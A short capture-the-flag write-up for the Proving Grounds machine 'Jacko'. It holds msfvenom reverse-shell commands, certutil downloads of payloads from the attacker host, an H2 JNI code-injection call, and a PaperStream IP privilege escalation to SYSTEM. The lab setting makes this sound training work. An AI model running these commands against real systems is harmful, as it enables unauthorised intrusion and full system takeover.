Jacko

Writeup for Jacko from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.209.66 all

Service Enumeration

HTTP (Port 8082)

Once logged in, we notice that this is running H2 console version 1.4.199, which happens to be vulnerable to code injection via java.

Exploit

H2 Database 1.4.199 - JNI Code ExecutionExploit Database

We can test if this works by trying to execute the systeminfo command.

We first generate shell.exe.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.209 LPORT=8082

Next, we transfer shell.exe via an HTTP server to the target machine.

certutil -urlcache -split -f http://192.168.49.209/home/kali/pg/jacko/shell.exe C:/Windows/Temp/shell.exe

We can then execute shell.exe to gain our reverse shell.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');

Looks like we need to fix the path variable first:

set PATH=%SystemRoot%\system32;%SystemRoot%;

Privesc

Transferring winPEAS:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.209:80/opt/PEASS-ng/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe winPEASx86.exe

Running winPEAS, we see the following.

However, both of these can't work in our case.

Under Program Files (x86) directory, we see PaperStream IP.

PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege EscalationExploit Database

We can copy the power shell script above and generate shell.dll.

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.209 LPORT=8082

Next, we transfer both files to the target machine.

And once we run exploit.ps1, we get SYSTEM.

PreviousAuthBy NextShenzi

Last updated 2 years ago